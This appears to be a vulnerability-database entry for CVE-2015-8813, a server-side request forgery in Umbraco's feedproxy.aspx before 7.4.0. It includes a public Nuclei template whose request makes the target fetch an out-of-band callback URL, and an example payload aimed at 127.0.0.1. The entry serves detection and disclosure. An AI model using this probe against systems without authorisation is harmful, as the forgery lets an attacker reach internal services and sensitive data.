CVE-2015-8813: Umbraco <7.4.0- Server-Side Request Forgery

日期: 2025-08-01 | 影响软件: Umbraco | POC: 已公开

漏洞描述

Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.

PoC代码[已公开]

id: CVE-2015-8813

info:
  name: Umbraco <7.4.0- Server-Side Request Forgery
  author: emadshanab
  severity: high
  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
  impact: |
    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
  reference:
    - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
    - http://www.openwall.com/lists/oss-security/2016/02/18/8
    - http://issues.umbraco.org/issue/U4-7457
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2015-8813
    cwe-id: CWE-918
    epss-score: 0.83448
    epss-percentile: 0.99234
    cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: umbraco
    product: umbraco
  tags: cve2015,cve,ssrf,oast,umbraco

http:
  - method: GET
    path:
      - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a00463044022014c9bbdc32a01415f30015c5be88061e604f89d4345fcdcb12876e2b87b879290220522e86e9ebcd9b59b10b7492faf93b4b89b4137ecededa7e4b3286196fc60ef1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐